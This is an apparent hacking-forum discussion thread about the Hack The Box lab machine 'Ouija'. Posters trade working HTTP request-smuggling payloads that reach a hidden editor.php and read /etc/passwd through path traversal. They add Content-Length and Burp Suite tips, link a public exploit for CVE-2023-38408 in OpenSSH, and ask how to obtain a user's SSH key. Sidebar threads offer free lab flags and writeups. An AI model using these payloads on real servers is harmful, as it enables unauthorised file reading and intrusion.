|
[ HTB ] - Ouija - [ Discussion ]
by RebeLHeX - Saturday December 2, 2023 at 06:32 PM
|
|
Dec 03, 2023, 05:31 AM
I'm getting timeouts for the second/smuggled request... I verified in a local lab env and it should work.
Dec 03, 2023, 10:37 AM
(Dec 02, 2023, 11:07 PM)rebelHex Wrote:(Dec 02, 2023, 09:45 PM)peRd1 Wrote:(Dec 02, 2023, 09:31 PM)rebelHex Wrote: In gitea UI I created a new token and tried that with no luck, but maybe I did something wrong, someone else should check as far i get i only found CVE-2023-38408 .... https://github.com/LucasPDiniz/CVE-2023-38408 ... the release we are working on (OpenSSH 8.9p1 Ubuntu 3ubuntu0.4)in theory should vulnerable ... but i do not dig in it ... im still looking around This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | https://breachforums.ai/Forum-Ban-Appeals if you feel this is incorrect.
Dec 03, 2023, 01:05 PM
Hey can anyone help, i am trying this :
POST /index.html HTTP/1.1 Host: ouija.htb Content-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa: Content-Length: 88 GET http://dev.ouija.htb/editor.php?file=../...etc/passwd HTTP/1.1 x:Get / HTTP/1.1 Host: ouija.htb
Dec 03, 2023, 02:22 PM
(Dec 03, 2023, 01:05 PM)nenandjabhata Wrote: Hey can anyone help, i am trying this : I think (I might be wrong) that you have to change your content length to something like 74. But even if I got the html for editor.php, I can't read the content of any file. Any ideas?
Dec 03, 2023, 02:32 PM
(This post was last modified: Dec 03, 2023, 02:48 PM by caccapuzza.)
the content lenght need to be the size of the second request:
POST /index.html HTTP/1.1 Host: ouija.htb Content-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa: Content-Length: 80 GET http://dev.ouija.htb/editor.php?file=../...etc/passwd HTTP/1.1 x:Get / HTTP/1.1 Host: ouija.htb (this payload works) if you want to search ../../../../../etc/passwd, so u added 3 chars so the content lenght of this new request should be 83. Check your burpsuite settings in repeater, the 'Update content-lenght' need to be off every time you restart burpsuite EDIT: for some reason the post rendering mess up url, the path to file in first request is ../../../../etc/passwd POST /index.html HTTP/1.1 Host: ouija.htb Content-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa: Content-Length: 42 GET http://ouija.htb/admin/ HTTP/1.1 x:Get / HTTP/1.1 Host: ouija.htb Whit this i can also get /admin/ but there is nothing there. The requests in order to work need to have 2 \n\r as separator (one between the two and one at the end)
Dec 03, 2023, 04:29 PM
Dec 03, 2023, 04:29 PM
Dec 03, 2023, 04:36 PM
[quote="JacquesPhil12" pid='276693' dateline='1701620436']
GOT ssh key for leila How to find it.Please share.
Dec 03, 2023, 04:40 PM
|
|
« Next Oldest | Next Newest »
|
| Possibly Related Threads… | |||||
| Thread | Author | Replies | Views | Last Post | |
| [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags | 21 | 2,542 |
18 minutes ago Last Post: popoler |
||
| [FREE] CPTS 12 FLAGS | 66 | 1,795 |
7 hours ago Last Post: vlka |
||
| [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired | 370 | 92,598 |
Yesterday, 05:05 PM Last Post: lifolifo007 |
||
| Hack the box Pro Labs, VIP, VIP+ 1 month free Method | 23 | 2,218 |
Yesterday, 02:10 PM Last Post: kkkato |
||
|
|
[FREE] HackTheBox All Cheatsheets | 3 | 417 |
Apr 29, 2026, 10:36 PM Last Post: op334 |
|
